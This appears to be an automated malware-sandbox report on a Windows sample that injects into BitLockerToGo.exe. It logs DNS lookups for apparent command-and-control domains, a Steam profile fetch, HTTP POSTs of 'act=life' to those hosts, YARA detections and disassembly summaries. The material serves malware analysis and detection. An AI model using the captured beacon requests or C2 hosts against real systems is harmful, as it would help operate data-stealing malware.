Oct 2, 2024 14:55:29.336951017 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:29.336963892 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:29.336970091 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:29.603353024 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:29.603404999 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:29.603475094 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:29.603775024 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:29.603782892 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.249186993 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.249279976 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.250813961 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.250823021 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.251056910 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.252469063 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.299406052 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.796559095 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.796581984 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.796596050 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.796633959 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.796663046 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.796679974 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.796705008 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.900701046 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.900719881 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.900820971 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.900861025 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.901596069 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.906116009 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.906168938 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.906198978 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.906217098 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.906256914 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.906390905 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.906408072 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.906433105 CEST | 49717 | 443 | 192.168.2.8 | 104.102.49.254
Oct 2, 2024 14:55:30.906439066 CEST | 443 | 49717 | 104.102.49.254 | 192.168.2.8
Oct 2, 2024 14:55:30.931730032 CEST | 49718 | 443 | 192.168.2.8 | 172.67.209.193
Oct 2, 2024 14:55:30.931761980 CEST | 443 | 49718 | 172.67.209.193 | 192.168.2.8
Oct 2, 2024 14:55:30.931837082 CEST | 49718 | 443 | 192.168.2.8 | 172.67.209.193
Oct 2, 2024 14:55:30.932135105 CEST | 49718 | 443 | 192.168.2.8 | 172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:30.932147026 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.799834967 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.799985886 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.801623106 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.801637888 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.802052975 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.803328037 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.803368092 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.803409100 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:32.267947912 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:32.268125057 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:32.268181086 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:32.268420935 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:32.268440008 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 2, 2024 14:55:28.171967030 CEST5951253192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:28.185643911 CEST53595121.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.359107018 CEST5769353192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.368637085 CEST53576931.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.371417999 CEST4936453192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.380625963 CEST53493641.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.383141994 CEST5975953192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.461071014 CEST53597591.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.464436054 CEST5962353192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.547616959 CEST53596231.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.551415920 CEST6035353192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.560189009 CEST53603531.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.563127995 CEST5418053192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.572525978 CEST53541801.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.573765993 CEST6380653192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.582690001 CEST53638061.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.584439993 CEST6449853192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.593302965 CEST53644981.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.596159935 CEST6082853192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.602756023 CEST53608281.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.920080900 CEST6545653192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:30.930160999 CEST53654561.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 14:55:28.171967030 CEST | 192.168.2.8 | 1.1.1.1 | 0xefdc | Standard query (0) | dividenntykw.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.359107018 CEST | 192.168.2.8 | 1.1.1.1 | 0xe18b | Standard query (0) | gutterydhowi.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.371417999 CEST | 192.168.2.8 | 1.1.1.1 | 0xe3ae | Standard query (0) | ghostreedmnu.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.383141994 CEST | 192.168.2.8 | 1.1.1.1 | 0x129d | Standard query (0) | offensivedzvju.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.464436054 CEST | 192.168.2.8 | 1.1.1.1 | 0xf474 | Standard query (0) | vozmeatillu.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.551415920 CEST | 192.168.2.8 | 1.1.1.1 | 0x92a6 | Standard query (0) | drawzhotdog.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.563127995 CEST | 192.168.2.8 | 1.1.1.1 | 0x542b | Standard query (0) | fragnantbui.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.573765993 CEST | 192.168.2.8 | 1.1.1.1 | 0x45d4 | Standard query (0) | stogeneratmns.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.584439993 CEST | 192.168.2.8 | 1.1.1.1 | 0xfb48 | Standard query (0) | reinforcenh.shop | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.596159935 CEST | 192.168.2.8 | 1.1.1.1 | 0x3e2b | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:30.920080900 CEST | 192.168.2.8 | 1.1.1.1 | 0x3f47 | Standard query (0) | gravvitywio.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 14:55:28.185643911 CEST | 1.1.1.1 | 192.168.2.8 | 0xefdc | No error (0) | dividenntykw.shop | | 172.67.188.210 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:28.185643911 CEST | 1.1.1.1 | 192.168.2.8 | 0xefdc | No error (0) | dividenntykw.shop | | 104.21.8.235 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.368637085 CEST | 1.1.1.1 | 192.168.2.8 | 0xe18b | Name error (3) | gutterydhowi.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.380625963 CEST | 1.1.1.1 | 192.168.2.8 | 0xe3ae | Name error (3) | ghostreedmnu.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.461071014 CEST | 1.1.1.1 | 192.168.2.8 | 0x129d | Name error (3) | offensivedzvju.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.547616959 CEST | 1.1.1.1 | 192.168.2.8 | 0xf474 | Name error (3) | vozmeatillu.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.560189009 CEST | 1.1.1.1 | 192.168.2.8 | 0x92a6 | Name error (3) | drawzhotdog.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.572525978 CEST | 1.1.1.1 | 192.168.2.8 | 0x542b | Name error (3) | fragnantbui.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.582690001 CEST | 1.1.1.1 | 192.168.2.8 | 0x45d4 | Name error (3) | stogeneratmns.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.593302965 CEST | 1.1.1.1 | 192.168.2.8 | 0xfb48 | Name error (3) | reinforcenh.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:29.602756023 CEST | 1.1.1.1 | 192.168.2.8 | 0x3e2b | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:30.930160999 CEST | 1.1.1.1 | 192.168.2.8 | 0x3f47 | No error (0) | gravvitywio.store | | 172.67.209.193 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 14:55:30.930160999 CEST | 1.1.1.1 | 192.168.2.8 | 0x3f47 | No error (0) | gravvitywio.store | | 104.21.16.12 | A (IP address) | IN (0x0001) | false
• dividenntykw.shop
• steamcommunity.com
• gravvitywio.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49716 | 172.67.188.210 | 443 | 6736 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 12:55:28 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: dividenntykw.shop
2024-10-02 12:55:28 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-02 12:55:29 UTC | 772 | IN | HTTP/1.1 200 OK
    Date: Wed, 02 Oct 2024 12:55:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=93qie3uvbdrq89379gj5k2j0as; expires=Sun, 26 Jan 2025 06:42:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBlE5AhvJtISe6SJJxOde8pcHsnDtT1s2f2IB8UxyQO5jmm6wss39orC2HLCk%2BtTdK3usNSBR25TaG4oPdmWNFi05tWsj6enHwqZtY1Lqmrs61QbHVO9drYaANfmmoZrZf41%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cc4d8d5c8ac0ce9-EWR
2024-10-02 12:55:29 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-02 12:55:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49717 | 104.102.49.254 | 443 | 6736 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 12:55:30 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-10-02 12:55:30 UTC | 1870 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Wed, 02 Oct 2024 12:55:30 GMT
    Content-Length: 34837
    Connection: close
    Set-Cookie: sessionid=1e3031f20caafb608e56075f; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 12:55:30 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 12:55:30 UTC | 16384 | IN | Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-02 12:55:30 UTC | 3768 | IN | Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-02 12:55:30 UTC | 171 | IN | Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49718	172.67.209.193	443	6736	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 12:55:31 UTC	264	OUT	POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: gravvitywio.store
2024-10-02 12:55:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-02 12:55:32 UTC	772	IN	HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 12:55:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=35hfla59mok3pdr1n92oaupp8n; expires=Sun, 26 Jan 2025 06:42:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBnVjYvP3mvFDnIHNDjfq1W46s5kghtuPjYbh9fz01n6cie%2BnrJHCdzzEQJ5SPiHnZ9UZGlBiatN5WWmBVfkgnQu%2F5Wdcwnyot9MEvu4P2NGz1lDF5OL1NhQiUL1U0VPmXF3lw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cc4d8e83fd28c60-EWR
2024-10-02 12:55:32 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-02 12:55:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID: 0
Start time: 08:54:44
Start date: 02/10/2024
Path: C:\Users\user\Desktop\BW4pTs1x3V.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\BW4pTs1x3V.exe"
Imagebase: 0x7ff67ce60000
File size: 13'565'176 bytes
MD5 hash: 3677EBC159E92251F19020E9AB4B62AD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 08:55:26
Start date: 02/10/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase: 0xc90000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true


Execution Graph

Execution Coverage: 1.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 41.3%
Total number of Nodes: 63
Total number of Limit Nodes: 9

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 'U!W$*]^_$0A"C$6Y)[$?Q'S$DM$G1\3$G5@7$M#N]$SU$T'W!$TW$X9R;$Y-]/$\_$w=v?$IK
• API String ID: 0-1031535001
• Opcode ID: 739ba02ca6fbb15f1de5592ee61e238cfa73bd0585d7b84c3a26309e22eeb9d0
• Instruction ID: d75a51552504485b9a4ccb28dcb79d409079e5b3c927a21ada27449f9ffe4391
• Opcode Fuzzy Hash: 739ba02ca6fbb15f1de5592ee61e238cfa73bd0585d7b84c3a26309e22eeb9d0
• Instruction Fuzzy Hash: B2F170B050C380ABD7609F21E880B6FBBE5FF86744F509C1CE98A9B241DB748855CF96

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: CurrentProcess$ExitInputStateThread
• String ID: G'&!
• API String ID: 1029096631-2503113863
• Opcode ID: a18b6dd8ee09b44e6278d5313e9cca66c68506b5489c2062df2fc61e7cd55d4e
• Instruction ID: 47fa65b03a58f81c93531bb0e255f8046d1a0261d438e341b7af815d1f238904
• Opcode Fuzzy Hash: a18b6dd8ee09b44e6278d5313e9cca66c68506b5489c2062df2fc61e7cd55d4e
• Instruction Fuzzy Hash: A841257180C280ABD301BF68D584A1EFBE6EF96705F548D0CE6C587262C336D821DBA7

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ,c'}$6{6u$@3R${7@1
• API String ID: 0-581628498
• Opcode ID: 4d1847d5fb10d30c15587fc5077681038c322498ab6aa18164c2b54b1fcaac3a
• Instruction ID: 418f93d84e5a37305fb6efed1249bce58ee28e8686d415298a94eef9d3d883a2
• Opcode Fuzzy Hash: 4d1847d5fb10d30c15587fc5077681038c322498ab6aa18164c2b54b1fcaac3a
• Instruction Fuzzy Hash: A1021DB1600B009FD3308F26D894B56BBF5FB4A315F008E5CE9AA8BB90D775A815CF90

Control-flow Graph
• Function entry 02D15EB1, basic blocks 02D15EB1-02D165BB; no APIs section (the only system-level call is reached through 02D15AD0, the LdrInitializeThunk stub listed below)
• Internal calls: 02D17080, 02D15AD0, 02D17110, 02D17190
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %sgh$4`[b
• API String ID: 0-1596593044
• Opcode ID: fc31db515b390fc83225504a4e15333edbdac4d4488b0952fadf307a30e0fdfb
• Instruction ID: 72655a907470c2dd79e4ace881de4e75d8ae0a399a51658e8f0af2d16b2e62c5
• Opcode Fuzzy Hash: fc31db515b390fc83225504a4e15333edbdac4d4488b0952fadf307a30e0fdfb
• Instruction Fuzzy Hash: 1A919C74A0C341ABE315DF18E490A2AFBE5EB9A345F648C1CE4C5877A1D335DC64CBA2

Control-flow Graph
• Function entry 02D15AD0, a single basic block 02D15AD0-02D15B02 that calls LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(02D193AD,005C003F,00000006,?,?,00000018,00070605,?,?), ref: 02D15AFE
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
• Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Control-flow Graph
• Function entry 02CDEA30, basic blocks 02CDEA30-02CDF3B1; imported API LoadLibraryExW called from block 02CDEB3C-02CDEB57
• Internal calls: 02CE1020, 02D13DF0, 02D18840 (12 call sites), 02CE0FB0, 02CDF950, 02CE1110, 02CE1090, 02D126B0 (the RtlFreeHeap wrapper listed below), 02CE1190, 02CDF3C0, 02CE0E50
APIs
• LoadLibraryExW.KERNEL32(9F779963,00000000,93929990), ref: 02CDEB47
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: LibraryLoad
• String ID: >
• API String ID: 1029625771-325317158
• Opcode ID: fa19999e2dfe8ed87f8c1744472e6684bad235fb0052fd1cbed204776e9d3cbd
• Instruction ID: b816e9f9635f35d769440150005af58c2158dae58bedf08ba2aea6eaa455731c
• Opcode Fuzzy Hash: fa19999e2dfe8ed87f8c1744472e6684bad235fb0052fd1cbed204776e9d3cbd
• Instruction Fuzzy Hash: 4312AEB5908381DBE320DF24E950B6FBBE1EB95304F090C2CE5899B742D3358919CBA3

Control-flow Graph
• Function entry 02D15520, basic blocks 02D15520-02D155D4; imported API RtlReAllocateHeap called from block 02D15596-02D155AA
• Internal calls: 02D126B0 (RtlFreeHeap wrapper), 02D12630 (RtlAllocateHeap wrapper), 02D15A50
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 02D155A4
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: fe0edea62908a110ffbc02a74e3a9573de2bb16a84bbc8ce7dc98f17e14ec106
• Instruction ID: 88d901b891f289fe11f6e42ffbce1f5471347e4b9b506867cc32a3539836bb49
• Opcode Fuzzy Hash: fe0edea62908a110ffbc02a74e3a9573de2bb16a84bbc8ce7dc98f17e14ec106
• Instruction Fuzzy Hash: 7B118F7190C250ABD3116F18F808A1FBBF5EF96700F454868E8C487751D33ADC29CBA2

Control-flow Graph
• Function entry 02D126B0, basic blocks 02D126B0-02D1272D; imported API RtlFreeHeap called from block 02D12716-02D12723
• Internal call: 02D159E0
APIs
• RtlFreeHeap.NTDLL(?,00000000), ref: 02D12723
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 2bf6c4b9cc20354fd06ef954e7e0f17fc2aad3b24c23af17b1c48f52166fe663
• Instruction ID: cd0ca6f9841ac1b226fe0268b5062a821abb0471552f3e60ecb537b4d70f01d8
• Opcode Fuzzy Hash: 2bf6c4b9cc20354fd06ef954e7e0f17fc2aad3b24c23af17b1c48f52166fe663
• Instruction Fuzzy Hash: ADF03C3050C290ABD311AF18E855B0EBBE5EF56700F468C6CE8C49B351C236DC64DBA3

Control-flow Graph
• Function entry 02D12630, basic blocks 02D12630-02D1269F; imported API RtlAllocateHeap called from block 02D12686-02D1269F
• Internal call: 02D15950
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02D12693
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
